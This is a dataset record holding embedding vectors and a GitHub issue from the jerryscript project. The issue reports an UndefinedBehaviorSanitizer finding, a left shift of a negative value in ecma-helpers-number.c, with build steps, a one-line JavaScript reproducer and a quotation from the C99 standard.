-0.0038682527374476194, -0.025865117087960243, -0.014796516858041286, -0.005052118096500635, -0.0078804399818182, -0.007513406220823526, 0.034573182463645935, 0.005361577961593866, 0.02030922658741474, 0.010528843849897385, -0.009845152497291565, 0.006847707089036703, 0.009600463323295116, -0.0018405686132609844, -0.0030136387795209885, -0.005570284090936184, -0.006207196041941643, 0.0009022924350574613, -0.02331746742129326, -0.003821473801508546, 0.0012261461233720183, 0.024684850126504898, 0.03008241206407547, 0.01322762481868267, -0.0022435865830630064, -0.016034357249736786, -0.002364132087677717, -0.011529192328453064, -0.007837260141968727, -0.006131630390882492, 0.013681020587682724, 0.008398606441915035, -0.0021392337512224913, 0.016408588737249374, 0.00114518275950104, 0.016293440014123917, 0.007463029120117426, 0.005350783001631498, 0.004501566756516695, -0.012277654372155666, 0.009089494124054909, 0.02094254083931446, -0.0013601855607703328, 0.01790551282465458, 0.00919024832546711, -0.02184933051466942, 0.002265176735818386, -0.021446311846375465, -0.007164363749325275, 0.01606314443051815, -0.006210794672369957, -0.0027941379230469465, 0.010464073158800602, -0.02209402061998844, 0.018135808408260345, 0.0187403354793787, -0.018466858193278313, 0.0006463580648414791, -0.0053651765920221806, -0.0018054844113066792, -0.011111781001091003, 0.0027869411278516054, 0.0084273936226964, 0.012824607081711292, -0.005886940751224756, -0.028124896809458733, 0.014091234654188156, 0.011579569429159164, 0.004731862805783749, 0.02147509902715683, -0.023562157526612282, 0.026325708255171776, -0.006333139259368181, 0.0016480556223541498, 0.002619616687297821, 0.002992048393934965, -0.013853741809725761, 0.010651188902556896, -0.010190596804022789, 0.0011676725698634982, 0.015660125762224197, -0.01039930246770382, 0.0033680787310004234, 0.008708066307008266, 0.0004911781288683414, -0.004954962059855461, 0.004652698524296284, -0.04090632125735283, 0.007736505474895239, -0.0051924544386565685, -0.00806035939604044, 0.00879442784935236, -0.014796516858041286, -0.018970631062984467, 0.002589030424132943, 0.006315147504210472, -0.006898084189742804, 0.005642251577228308, -0.010564828291535378, -0.02104329504072666, -0.034889839589595795, 0.006685779895633459, 0.0012351421173661947, -0.017862331122159958, 0.00047408585669472814, 0.0023227508645504713, 0.008621705695986748, 0.0019341263687238097, 0.0008847503340803087, 0.0076285540126264095, 0.010219383984804153, -0.01412002183496952, 0.012579917907714844, -0.00648427102714777, -0.007499012630432844, -0.007945211604237556, -0.0036469525657594204, 0.02284248173236847, -0.028729422017931938, -0.015041206032037735, 0.0018675564788281918, -0.006379918195307255, -0.010903075337409973, -0.010759140364825726, -0.003114393213763833, 0.010694369673728943, -0.01633661985397339, -0.00926221627742052, -0.010212186723947525, -0.003371677128598094, 0.00322954123839736, 0.0056386529467999935, 0.01564573310315609, 0.021604640409350395, 0.004918978083878756, -0.010751943103969097, 0.0016138709615916014, 0.013062099926173687, -0.006282762158662081, -0.005527103319764137, -0.008146720007061958, -0.006660591345280409, 0.01653813011944294, 0.010708763264119625, 0.0077940793707966805, 0.018294136971235275, 0.0014789319830015302, -0.0027329656295478344, 0.008391409181058407, -0.008880788460373878, -0.0028427159413695335, -0.0059769004583358765, 0.013846545480191708, 0.005796981509774923, 0.006962854880839586, 0.01673963852226734, -0.009917120449244976, -0.005577480420470238, 0.014242366887629032, 0.005537898745387793, 0.0035821818746626377, -0.0045411488972604275, 0.014796516858041286, 0.004015786107629538, 0.006523853167891502, -0.005876145791262388, -0.0025548459962010384, 0.007815669290721416, -0.007578176911920309, -0.013666626997292042, -0.004771444946527481, 0.004116540774703026, -0.018135808408260345, -0.009125477634370327, -0.03244294598698616, 0.019402435049414635, 0.014127219095826149, 0.014537433162331581, -0.005174462683498859, -0.009269412606954575, 0.0006486070342361927, 0.011860243044793606, -0.00179828773252666, -0.02839837223291397, 0.0032205453608185053, -0.020539522171020508, -0.008038768544793129, 0.004339639563113451, 0.00039042363641783595, -0.009082297794520855, -0.01306929625570774, -0.004145327489823103, -0.014782123267650604, -0.013875332660973072, 0.009571676142513752, 0.03759581968188286, 0.0026609981432557106, 0.0006697474746033549, 0.013090887106955051, 0.005930121522396803, -0.03742309659719467, 0.0037387111224234104, -0.023763665929436684, 0.03250052034854889, -0.004659895319491625, -0.011925013735890388, 0.0012081542517989874, 0.018985023722052574, 0.004138130694627762, -0.023447008803486824, 0.002693383488804102, -0.0061604175716638565, 0.01963273249566555, 0.0052680205553770065, 0.005563087295740843, -0.007027625571936369, 0.015429830178618431, 0.01659570448100567, 0.009888333268463612, 0.0133859533816576, -0.007290306966751814, 0.012932558543980122, 0.00568183371797204, 0.007973997853696346, 0.00022287432511802763, 0.0009427741752006114, 0.014551826752722263, -0.005757399369031191, 0.028945324942469597, -0.005350783001631498, 0.0033428899478167295, -0.02094254083931446, 0.008556935004889965, 0.00014955743972677737, 0.008722459897398949, 0.017775971442461014, 0.004706673789769411, -0.02173418179154396, -0.0004390017129480839, -0.0103129418566823, 0.017934300005435944, -0.009751595556735992, -0.01889866404235363, -0.006761346012353897, -0.003994195722043514, -0.006387114990502596, -0.002894892357289791, -0.0032277419231832027, -0.021921297535300255, -0.010960648767650127, -0.01306929625570774, -0.003969007171690464, 0.01590481586754322, -0.0078012761659920216, 0.007113986648619175, 0.035839810967445374, 0.028628667816519737, 0.0029056875500828028, -0.001410562894307077, 0.016581309959292412, 0.01522832177579403, 0.001359286019578576, 0.0017587055917829275, -0.021906904876232147, -0.018510039895772934, 0.009715611115098, 0.009067904204130173, 0.009233429096639156, 0.009060706943273544, -0.003947416786104441, 0.004692280665040016, 0.006329541094601154, 0.0070744045078754425, 0.004210098180919886, 0.012680672109127045, 0.01842367835342884, 0.009154264815151691, -0.005178060848265886, 0.00016248910105787218, -0.015573765151202679, -0.018725940957665443, 0.009593266993761063, 0.012673475779592991, -0.010845500975847244, 0.04159720987081528, 0.019402435049414635, -0.010780730284750462, 0.005483923014253378, 0.01584724150598049, -0.009312593378126621, 0.004940568469464779, 0.009658037684857845, 0.018596399575471878, 0.012587114237248898, 0.023115959018468857, -0.006340336054563522, -0.0028121296782046556, 0.010377712547779083, 0.020496342331171036, -0.0006148722604848444, 0.0249871127307415, 0.017833543941378593, -0.021489493548870087, -0.0013709807535633445, -0.013875332660973072, 0.030255133286118507, -0.004566337447613478, 0.003986998926848173, 0.0012234473833814263, -0.023029597476124763, 0.015688912943005562, 0.050175733864307404, 0.005318397656083107, -0.006959256716072559, -0.02262657880783081, 0.006739755626767874, -0.013788971118628979, -0.04536830633878708, 0.020122110843658447, 0.01050005666911602, 0.009600463323295116, 0.003929425030946732, 0.0011056006187573075, 0.0025818338617682457, -0.0016156701603904366, 0.007121183443814516, -0.0044439928606152534, 0.021978871896862984, 0.008693672716617584, -0.02268415316939354, -0.006556238513439894, 0.006764944177120924, -0.006124433595687151, 0.016192685812711716, 0.004328844603151083, -0.004253278952091932, -0.019517583772540092, -0.010507253929972649, -0.00882321409881115, -0.008700869977474213, 0.0010552234016358852, -0.0006454584654420614, 0.0004531703016255051, -0.01784793846309185, -0.010737549513578415, -0.006808124948292971, -0.010528843849897385, -0.004497968126088381, 0.002459489041939378, -0.011644340120255947, 0.023749273270368576, -0.017085082828998566, -0.007772488985210657, -0.011356470175087452, 0.012745442800223827, 0.00552350515499711, -0.005883342586457729, -0.010255367495119572, -0.005653046537190676, -0.022439464926719666, 0.009535692632198334, -0.004141729325056076, 0.001270226202905178, -0.023115959018468857, 0.008679279126226902, 0.002981253433972597, 0.009326986968517303, -0.028916537761688232, -0.015271501615643501, 0.0317232720553875, 0.012867787852883339, 0.015588158741593361, 0.025908296927809715, 0.002020487328991294, 0.01097504235804081, 0.022511431947350502, -0.004300057888031006, -0.010931862518191338, -0.00836981926113367, 0.0014420485822483897, 0.003965409006923437, 0.010046661831438541, -0.025735575705766678, 0.003191758180037141, -0.00001366960714221932, -0.011298896744847298, 0.010823911055922508, -0.008880788460373878, -0.008081949315965176, 0.0065202550031244755, 0.010809517465531826, -0.002961462363600731, -0.019647125154733658, 0.01092466525733471, 0.017560068517923355, 0.016624489799141884, 0.009780381806194782, -0.021863725036382675, 0.0034598372876644135, -0.014602203853428364, 0.015213928185403347, -0.01632222719490528, -0.020438767969608307, -0.024641670286655426, 0.0023605336900800467, 0.018236562609672546, 0.010888681747019291, -0.0176464281976223, 0.0167540330439806, 0.008225884288549423, -0.01790551282465458, 0.017344165593385696, 0.004152524285018444, 0.01522832177579403, 0.016782818362116814, -0.004544747062027454, 0.017891118302941322, -0.008398606441915035, 0.0028930932749062777, 0.00758537370711565, -0.026397675275802612, -0.016091931611299515, -0.020928146317601204, -0.011406847275793552, -0.0038034820463508368, -0.002680788980796933, -0.005332791246473789, 0.004933371674269438, -0.046692509204149246, -0.022281136363744736, 0.019517583772540092, 0.020985720679163933, 0.010435285978019238, 0.015242714434862137, 0.0006490568048320711, -0.011622750200331211, -0.012457572855055332, 0.006469877436757088, 0.003843064187094569, -0.011356470175087452, -0.016422981396317482, 0.0033788736909627914, 0.01616389863193035, -0.0023785256780683994, -0.021244803443551064, 0.04865002632141113, 0.019819848239421844, 0.01175948791205883, 0.006264770403504372, -0.001991700381040573, 0.01925850100815296, 0.011327682994306087, -0.01737295277416706, -0.010780730284750462, 0.009744398295879364, -0.005537898745387793, -0.0073478808626532555, 0.027520369738340378, -0.010895878076553345, 0.00645908247679472, 0.006401508580893278, 0.000621169398073107, -0.008297852240502834, -0.020078931003808975, -0.02641206979751587, -0.013501101173460484, 0.008600115776062012, 0.01794869266450405, -0.013134066946804523, 0.003524607978761196, 0.012594311498105526, 0.016509342938661575, 0.0013898721663281322, 0.004300057888031006, 0.0009814567165449262, 0.021086474880576134, -0.012090538628399372, -0.004699477460235357, 0.022511431947350502, 0.005728612188249826, -0.006196401081979275, 0.012313637882471085, 0.014148809015750885, 0.011450028046965599, -0.012896575033664703, 0.00863609928637743, 0.005397561937570572, -0.006153220776468515, 0.001752408454194665, 0.008305048570036888, 0.001502321450971067, 0.009384561330080032, 0.00284091685898602, 0.0021698197815567255, 0.00494776526466012, 0.006516656372696161, 0.021619034931063652, -0.011802668683230877, 0.007786882575601339, -0.011694717220962048, -0.0008154816459864378, 0.003481427440419793, 0.0052788155153393745, -0.006736157462000847, -0.008916771970689297, 0.0068117231130599976, -0.00874405074864626, -0.004260475747287273, 0.005350783001631498, -0.01207614503800869, -0.020409980788826942, 0.011665930040180683, 0.011011025868356228, -0.01853882521390915, 0.030168773606419563, 0.005858154036104679, 0.008549737744033337, -0.0054443408735096455, -0.001178467646241188, -0.008175507187843323, -0.030802085995674133, 0.007693324703723192, -0.002734764711931348, 0.011198141612112522, -0.0040949503891170025, -0.02115844190120697, -0.013947299681603909, 0.012939754873514175, -0.00043292943155393004, 0.0006450086366385221, -0.018927451223134995, -0.014494253322482109, -0.013947299681603909, -0.01386093907058239, 0.01042089331895113, 0.016941146925091743, 0.008492164313793182, -0.023533370345830917, 0.000023698670702287927, 0.0011982587166130543, -0.012666278518736362, -0.017027508467435837, -0.012349621392786503, -0.004033777862787247, 0.004663493484258652, -0.0025620427913963795, 0.018035054206848145, -0.009485315531492233, -0.002626813482493162, 0.02272733487188816, -0.006930469535291195, -0.006998838856816292, -0.008074752986431122, -0.014271154068410397, 0.004879395943135023, 0.004843412432819605, 0.009269412606954575, -0.013947299681603909, -0.00476424815133214, 0.008909575641155243, 0.0012585314689204097, 0.005667440127581358, -0.0026412070728838444, 0.00029911487945355475, 0.00942054484039545, -0.022007659077644348, -0.01102541945874691, 0.02169100195169449, 0.024440160021185875, 0.013695414178073406, 0.00580057967454195, -0.001899941824376583, 0.019100172445178032, 0.001563493744470179, 0.004001392517238855, -0.008765640668570995, -0.03149297460913658, 0.017574461176991463, 0.016725245863199234, 0.0051708645187318325, 0.008225884288549423, -0.010413696058094501, 0.014479859732091427, 0.023706091567873955, 0.0008905977010726929, -0.021460706368088722, 0.056624021381139755, -0.00016046501696109772, -0.002351537812501192, -0.0017353161238133907, 0.021273590624332428, -0.004731862805783749, -0.00926221627742052, 0.0022561808582395315, -0.02032361924648285, 0.008470573462545872, 0.006664189975708723, 0.01173070166260004, 0.0040085893124341965, 0.00515647092834115, 0.005034125875681639, 0.025606034323573112, 0.007729308679699898, -0.027232499793171883, 0.013659429736435413, -0.0014492453774437308, 0.0019269295735284686, -0.007916424423456192, -0.003835867391899228, -0.006012883968651295, 0.008362622931599617, -0.011723504401743412, -0.0008487665909342468, 0.011255715973675251, -0.004886592738330364, -0.007822866551578045, 0.005969703663140535, -0.0051312823779881, -0.0168547872453928, 0.008923969231545925, 0.021172836422920227, 0.012853394262492657, 0.0029560646507889032, 0.02184933051466942, 0.01586163602769375, 0.021460706368088722, -0.01010423619300127, -0.0232023186981678, 0.007866047322750092, 0.02110086940228939, 0.0012261461233720183, -0.01312687061727047, -0.013781774789094925, 0.028700636699795723, 0.008715263567864895, -0.0049873474054038525, -0.020222865045070648, 0.029650606215000153, -0.0134363304823637, -0.010233777575194836, 0.02446894720196724, 0.01779036410152912, 0.0018585604848340154, 0.006865698844194412, -0.016264652833342552, 0.008168309926986694, -0.011536388657987118, -0.019978174939751625, 0.02793778106570244 ]
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
<!-- First of all, when reporting a bug, give the issue a descriptive title. In the body of the issue, optionally give a free-form text description of the bug. Give the context necessary for others to understand the problem. Then, provide information necessary to reproduce the bug. Omit sections that are irrelevant for the bug report, but note that information like git revision, build platform, build command, and test case are required in almost all cases. --> ###### JerryScript revision <!-- Identify the git hash(es) or tag(s) where the issue was observed. --> ccc1525 ###### Build platform <!-- Name the build platform. E.g., copy the output of `echo "$(lsb_release -ds) ($(uname -mrs))"` (on Linux), `echo "$(sw_vers -productName) $(sw_vers -productVersion) ($(uname -mrs))"` (on macOS), or `python -c "import platform; print(platform.platform())"` (should work everywhere). --> Ubuntu 20.04.1 LTS (Linux 5.4.0-74-generic x86_64) ###### Build steps <!-- Describe how to build JerryScript. Give all the necessary details of the build (e.g., environment variables, command(s), profile, command line options, etc.). E.g.: ```sh tools/build.py --clean --debug ``` Or: ```sh mkdir build && cmake -H. -Bbuild && make -C build ``` Even if the bug was originally observed when JerryScript was integrated into a larger project, try to reproduce it with as few external code as possible, preferably by building the `jerry` command line tool. --> ```sh readonly FLAGS=( "-g -O1 -fsanitize=address,undefined -fno-sanitize-recover=undefined,address" ) cmake -D CMAKE_C_FLAGS="${FLAG}" -D CMAKE_BUILD_TYPE=Debug -D CMAKE_INSTALL_PREFIX:PATH="${INSTALL_DIR}" "${SRC_FOLDER}" make make install ``` <!-- ###### Build log Copy the build log if the reported issue is a build problem. Do a verbose build if necessary. Try and trim the log to relevant parts. --> ###### Test case <!-- Give the JavaScript input that should be passed to the engine to trigger the bug. Try and post a reduced test case that is minimally necessary to reproduce the issue. As a rule of thumb, use Markdown's fenced code block syntax for the test case. Attach the file (renamed to .txt) if the test case contains 'problematic' bytes that cannot be copied in the bug report directly. --> ```javascript for (; j = 1; j *= -8) {} ``` <!-- ###### Execution platform Unnecessary if the same as the build platform. --> <!-- ###### Execution steps List the steps that trigger the bug. E.g., if a bug is snapshot-specific: ```sh build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot ``` Unnecessary if trivial (i.e., `build/bin/jerry testcase.js`). --> ###### Output <!-- Copy relevant output from the standard output and/or error channels. --> ``` jerryscript/jerry-core/ecma/base/ecma-helpers-number.c:700:51: runtime error: left shift of negative value -8 ``` <!-- ###### Backtrace In case of a crash (assertion failure, etc.), try to copy the backtrace from a debugger at the point of failure. --> ###### Expected behavior <!-- Describe what should happen instead of current behavior. Unnecessary if trivial (e.g., in case of a crash, the trivial expected behavior is not to crash). --> According to C99 standard (6.5.7/4): > The result of E1 << E2 is E1 left-shifted E2 bit positions; vacated bits are filled with zeros. If E1 has an unsigned type, the value of the result is E1 × 2 E2 , reduced modulo one more than the maximum value representable in the result type. If E1 has a signed type and nonnegative value, and E1 × 2 E2 is representable in the result type, then that is the resulting value; otherwise, the behavior is undefined.
ubsan: jerryscript/jerry-core/ecma/base/ecma-helpers-number.c:700:51: runtime error: left shift of negative value -8
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4702/comments
0
2021-06-30T09:24:46
2021-12-23T10:33:23Z
https://github.com/jerryscript-project/jerryscript/issues/4702
933,487,858
4,702
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : ubsan: jerryscript/jerry-core/ecma/base/ecma-helpers-number.c:700:51: runtime error: left shift of negative value -8 Issue date: --- start body --- <!-- First of all, when reporting a bug, give the issue a descriptive title. In the body of the issue, optionally give a free-form text description of the bug. Give the context necessary for others to understand the problem. Then, provide information necessary to reproduce the bug. Omit sections that are irrelevant for the bug report, but note that information like git revision, build platform, build command, and test case are required in almost all cases. --> ###### JerryScript revision <!-- Identify the git hash(es) or tag(s) where the issue was observed. --> ccc1525 ###### Build platform <!-- Name the build platform. E.g., copy the output of `echo "$(lsb_release -ds) ($(uname -mrs))"` (on Linux), `echo "$(sw_vers -productName) $(sw_vers -productVersion) ($(uname -mrs))"` (on macOS), or `python -c "import platform; print(platform.platform())"` (should work everywhere). --> Ubuntu 20.04.1 LTS (Linux 5.4.0-74-generic x86_64) ###### Build steps <!-- Describe how to build JerryScript. Give all the necessary details of the build (e.g., environment variables, command(s), profile, command line options, etc.). E.g.: ```sh tools/build.py --clean --debug ``` Or: ```sh mkdir build && cmake -H. -Bbuild && make -C build ``` Even if the bug was originally observed when JerryScript was integrated into a larger project, try to reproduce it with as few external code as possible, preferably by building the `jerry` command line tool. --> ```sh readonly FLAGS=( "-g -O1 -fsanitize=address,undefined -fno-sanitize-recover=undefined,address" ) cmake -D CMAKE_C_FLAGS="${FLAG}" -D CMAKE_BUILD_TYPE=Debug -D CMAKE_INSTALL_PREFIX:PATH="${INSTALL_DIR}" "${SRC_FOLDER}" make make install ``` <!-- ###### Build log Copy the build log if the reported issue is a build problem. Do a verbose build if necessary. Try and trim the log to relevant parts. --> ###### Test case <!-- Give the JavaScript input that should be passed to the engine to trigger the bug. Try and post a reduced test case that is minimally necessary to reproduce the issue. As a rule of thumb, use Markdown's fenced code block syntax for the test case. Attach the file (renamed to .txt) if the test case contains 'problematic' bytes that cannot be copied in the bug report directly. --> ```javascript for (; j = 1; j *= -8) {} ``` <!-- ###### Execution platform Unnecessary if the same as the build platform. --> <!-- ###### Execution steps List the steps that trigger the bug. E.g., if a bug is snapshot-specific: ```sh build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot ``` Unnecessary if trivial (i.e., `build/bin/jerry testcase.js`). --> ###### Output <!-- Copy relevant output from the standard output and/or error channels. --> ``` jerryscript/jerry-core/ecma/base/ecma-helpers-number.c:700:51: runtime error: left shift of negative value -8 ``` <!-- ###### Backtrace In case of a crash (assertion failure, etc.), try to copy the backtrace from a debugger at the point of failure. --> ###### Expected behavior <!-- Describe what should happen instead of current behavior. Unnecessary if trivial (e.g., in case of a crash, the trivial expected behavior is not to crash). --> According to C99 standard (6.5.7/4): > The result of E1 << E2 is E1 left-shifted E2 bit positions; vacated bits are filled with zeros. If E1 has an unsigned type, the value of the result is E1 × 2 E2 , reduced modulo one more than the maximum value representable in the result type. If E1 has a signed type and nonnegative value, and E1 × 2 E2 is representable in the result type, then that is the resulting value; otherwise, the behavior is undefined. --- end body ---
4,035
[ -0.007984700612723827, -0.011232235468924046, 0.0008057063678279519, -0.01577172428369522, 0.03383084386587143, 0.008478890173137188, 0.001353727886453271, 0.04780936613678932, -0.03326605632901192, 0.01527753472328186, -0.027872322127223015, 0.018214436247944832, -0.003664066782221198, 0.02290218137204647, 0.005820853635668755, 0.03464978560805321, -0.05052034929394722, 0.019838202744722366, -0.03908338025212288, 0.0003415206738281995, 0.020134717226028442, 0.02054418995976448, -0.014882182702422142, 0.06043239310383797, -0.03244711086153984, 0.022605668753385544, 0.009523749351501465, 0.006138547323644161, -0.018030880019068718, -0.03623119741678238, 0.005471390672028065, 0.012065298855304718, -0.025909682735800743, -0.0005921456613577902, 0.030300915241241455, -0.0007051033899188042, 0.031769365072250366, 0.04538077116012573, -0.03304013982415199, 0.003364022821187973, -0.02526017464697361, -0.03001851961016655, -0.007970580831170082, 0.049419011920690536, 0.016901303082704544, 0.04233091324567795, 0.013357252813875675, -0.0008114425581879914, -0.025090739130973816, 0.012044119648635387, 0.0024868352338671684, -0.012990140356123447, 0.02959492802619934, -0.026488590985536575, -0.013653767295181751, -0.008937781676650047, 0.004945431370288134, 0.012432411313056946, 0.039761126041412354, 0.025853203609585762, -0.0009566108928993344, 0.004641856998205185, -0.01457154843956232, -0.005312543828040361, -0.009926161728799343, 0.03385908156633377, -0.009149577468633652, 0.02091130241751671, -0.017748484387993813, 0.005492570344358683, -0.017762605100870132, -0.007758785039186478, 0.04538077116012573, 0.052751265466213226, -0.0005956756067462265, -0.007073978427797556, 0.018821584060788155, 0.012100597843527794, -0.023481091484427452, -0.015362252481281757, 0.003819383680820465, 0.017861442640423775, -0.009749664925038815, -0.0005043386481702328, 0.008203555829823017, 0.012968961149454117, -0.010137957520782948, -0.060714785009622574, -0.023170456290245056, 0.005679656285792589, 0.010582728311419487, 0.01954169012606144, -0.018242675811052322, 0.02908661775290966, 0.002305043861269951, 0.02427179552614689, -0.01860978826880455, -0.003236945252865553, -0.03470626473426819, -0.011352253146469593, 0.025189576670527458, 0.01311721745878458, -0.021560808643698692, -0.001271657063625753, 0.01379496417939663, 0.02380584366619587, 0.025839082896709442, -0.007049269042909145, 0.023932920768857002, 0.09951577335596085, 0.0038440930657088757, -0.007525809574872255, -0.014896302483975887, 0.0016317098634317517, -0.012933661229908466, 0.01722605526447296, 0.023608168587088585, -0.008676566183567047, -0.03685246407985687, 0.04715985804796219, -0.008443591184914112, 0.0016264149453490973, 0.00773760536685586, 0.004800703842192888, -0.027985280379652977, 0.010455651208758354, 0.017339013516902924, 0.0029351364355534315, 0.027575809508562088, -0.012044119648635387, -0.02767464704811573, -0.008394172415137291, 0.015235175378620625, -0.031656406819820404, 0.009439031593501568, -0.020657146349549294, -0.0324188731610775, 0.027519330382347107, -0.019301654770970345, -0.06280450522899628, -0.023735245689749718, -0.011634647846221924, 0.022125598043203354, 0.0104697709903121, -0.028408871963620186, 0.007052799221128225, -0.01620943658053875, 0.038885701447725296, 0.00908603798598051, 0.0008101187995634973, -0.006449181120842695, 0.011578168720006943, 0.015136337839066982, -0.014345632866024971, 0.05777788534760475, 0.007956461049616337, -0.00175878731533885, 0.016520069912075996, -0.001997940009459853, -0.03905513882637024, -0.03829267621040344, -0.011740545742213726, -0.0204877108335495, -0.026968661695718765, -0.03620295599102974, 0.0014410937437787652, -0.01626591570675373, 0.02053006924688816, 0.01382320374250412, 0.020685385912656784, -0.00761052779853344, -0.003798204008489847, 0.002349168062210083, 0.04346049204468727, -0.020727746188640594, 0.004204146098345518, -0.023735245689749718, 0.020318273454904556, 0.025401372462511063, -0.02297278121113777, -0.002670391695573926, -0.003323428565636277, -0.030300915241241455, -0.02766052633523941, 0.04636915400624275, -0.057467252016067505, 0.0185391902923584, -0.036400631070137024, 0.012503010220825672, -0.010907482355833054, 0.0038899823557585478, -0.02047359012067318, -0.0006905424525029957, -0.0017217231215909123, 0.018765104934573174, 0.03764316812157631, -0.00999676063656807, -0.04185084253549576, -0.021687885746359825, 0.009142517112195492, 0.04631267488002777, 0.0006243562675081193, 0.0014666856732219458, -0.029651407152414322, -0.002959845820441842, -0.02189968153834343, -0.011041618883609772, 0.005725545343011618, -0.0009389612241648138, -0.01956992968916893, -0.01192410197108984, 0.01615295745432377, -0.004038239363580942, -0.023015139624476433, -0.03374612703919411, 0.014458591118454933, 0.020840702578425407, -0.011648767627775669, -0.024172956123948097, -0.005086628254503012, 0.004246504977345467, -0.012743045575916767, -0.026036759838461876, -0.024441231042146683, -0.05481274425983429, -0.03352021053433418, -0.023509329184889793, 0.011825263500213623, 0.0009901452576741576, -0.01429621409624815, 0.004119427874684334, 0.005951460916548967, -0.007095158100128174, 0.01211471762508154, 0.041709646582603455, 0.023537568747997284, -0.015842324122786522, 0.028521830216050148, -0.009806144051253796, 0.0050725084729492664, -0.014684506691992283, 0.011980580165982246, -0.05806028097867966, -0.04470302537083626, -0.009862623177468777, 0.005153696984052658, -0.014006759971380234, -0.016844823956489563, -0.0038652727380394936, 0.010843942873179913, -0.03199528157711029, -0.016124717891216278, -0.0004286658077035099, -0.02524605579674244, -0.007328133564442396, -0.029340773820877075, 0.02773112617433071, 0.047470491379499435, -0.004927781410515308, 0.0006442121230065823, 0.0012645971728488803, 0.01502337958663702, -0.05190408229827881, 0.012566548772156239, 0.03337901458144188, 0.028310034424066544, -0.06331281363964081, 0.006350343115627766, 0.006360932718962431, -0.04326281696557999, 0.07511689513921738, -0.03947873041033745, 0.0012054708786308765, 0.011959400959312916, -0.008669506758451462, -0.012037059292197227, -0.02185732312500477, 0.011253414675593376, -0.01314545702189207, 0.012234735302627087, 0.004684216342866421, 0.041737884283065796, 0.03705013915896416, 0.02432827465236187, 0.00008135384268825874, -0.004401822108775377, 0.019668767228722572, -0.0059302812442183495, -0.029425492510199547, -0.03047035075724125, 0.02101013995707035, -0.04749872907996178, -0.012022939510643482, 0.0035864082165062428, -0.0032210606150329113, -0.017437851056456566, 0.005421971436589956, -0.02675686590373516, -0.005400792229920626, 0.003978230524808168, -0.016124717891216278, -0.022139716893434525, 0.013484330847859383, 0.001251359935849905, -0.029397252947092056, -0.014352693222463131, -0.005079568363726139, -0.012326513417065144, -0.023989399895071983, -0.009460210800170898, 0.05297718197107315, -0.033661406487226486, 0.009177816100418568, -0.036400631070137024, -0.03388732299208641, -0.014938661828637123, 0.0505768284201622, -0.009248415008187294, -0.0007999702356755733, 0.021758485585451126, -0.03767140582203865, -0.04145549237728119, -0.01265126746147871, 0.015489330515265465, 0.04642563313245773, -0.021080737933516502, -0.036485351622104645, 0.0372195765376091, -0.07494746148586273, -0.024187076836824417, 0.021080737933516502, -0.0675487294793129, -0.01956992968916893, 0.01164170727133751, -0.009333133697509766, -0.03157168999314308, -0.03304013982415199, 0.032588306814432144, 0.018454471603035927, -0.011006319895386696, 0.00010705614113248885, -0.01568700559437275, -0.006569198798388243, 0.005330193322151899, 0.007398732006549835, -0.023636408150196075, -0.0062973941676318645, 0.024201195687055588, 0.010152077302336693, 0.012778344564139843, 0.0008913071942515671, 0.014345632866024971, 0.015348133631050587, -0.00004519964204519056, 0.03371788561344147, -0.047894082963466644, -0.06269154697656631, -0.018736865371465683, 0.028747744858264923, 0.025641407817602158, -0.030865702778100967, -0.02725105546414852, 0.003242240287363529, 0.00929077435284853, 0.002938666148111224, -0.001096043037250638, 0.017084859311580658, -0.0253590140491724, -0.04526781663298607, -0.021829083561897278, -0.030357392504811287, 0.006428001448512077, -0.008154137060046196, -0.0012390052434056997, -0.010335633531212807, -0.013385492376983166, 0.02816883660852909, -0.004295924212783575, -0.010399172082543373, 0.02236563339829445, -0.010900421999394894, 0.040297675877809525, 0.0050089699216187, -0.06506366282701492, -0.007130457554012537, 0.008669506758451462, -0.033576689660549164, 0.05212999880313873, 0.034028518944978714, -0.0055278693325817585, 0.0016775989206507802, 0.009417851455509663, -0.05441739410161972, -0.04089070111513138, -0.008415351621806622, 0.04402527958154678, -0.010985140688717365, -0.027081618085503578, 0.017084859311580658, -0.04738577455282211, -0.0008582141017541289, -0.03922457620501518, 0.005319603718817234, -0.017974400892853737, -0.007088098209351301, 0.03095042146742344, -0.029227815568447113, -0.02576848492026329, 0.015545809641480446, 0.006456241011619568, 0.030780984088778496, -0.02531665377318859, -0.01910397782921791, 0.011387552134692669, 0.022069118916988373, 0.013907922431826591, 0.013484330847859383, -0.01860978826880455, -0.018878063187003136, -0.00016943660739343613, -0.03383084386587143, -0.01663302816450596, 0.022196196019649506, 0.01362552773207426, 0.017790844663977623, -0.013392552733421326, -0.012665387243032455, 0.01814383827149868, 0.046002041548490524, 0.008831883780658245, -0.05018147826194763, -0.000558170082513243, -0.009198996238410473, 0.07918337732553482, 0.003570523578673601, -0.051254574209451675, -0.007109277881681919, -0.003766434732824564, -0.0324188731610775, -0.001178996404632926, 0.015955280512571335, 0.04004351794719696, -0.048825982958078384, -0.034988660365343094, -0.008627147413790226, -0.018030880019068718, -0.048402391374111176, 0.027547569945454597, -0.0324188731610775, 0.021744364872574806, -0.027858203276991844, 0.021292533725500107, 0.0209395419806242, -0.0029880853835493326, 0.02240799181163311, -0.025542570278048515, -0.029284294694662094, -0.013406671583652496, 0.02249271050095558, 0.017310773953795433, -0.0032545949798077345, 0.01948521099984646, -0.0034293264616280794, -0.0060820686630904675, -0.0011851738672703505, 0.026149718090891838, 0.008076478727161884, -0.015842324122786522, -0.022704506292939186, -0.0021814964711666107, 0.0012857768451794982, 0.01948521099984646, 0.019908802583813667, -0.005414911545813084, -0.001448153518140316, -0.0016052353894338012, -0.020374752581119537, 0.002513309707865119, -0.005549049004912376, -0.02517545595765114, 0.0037205456756055355, -0.04529605433344841, -0.010667447000741959, 0.01613883674144745, 0.01995116099715233, -0.0027480500284582376, 0.014119718223810196, 0.018369752913713455, 0.0027868791949003935, 0.015898801386356354, -0.01312427781522274, -0.011535809375345707, -0.0095661086961627, -0.016887182369828224, -0.0014199140714481473, 0.007801143918186426, -0.03239063173532486, -0.008761284872889519, 0.014063239097595215, 0.022986900061368942, -0.008288274519145489, -0.026883943006396294, 0.0282111968845129, 0.013300773687660694, -0.013653767295181751, -0.029820844531059265, -0.029340773820877075, 0.061223097145557404, -0.024172956123948097, -0.01858154870569706, 0.006805703975260258, -0.0642164796590805, 0.004475950729101896, 0.00012067946227034554, -0.026869822293519974, -0.010907482355833054, 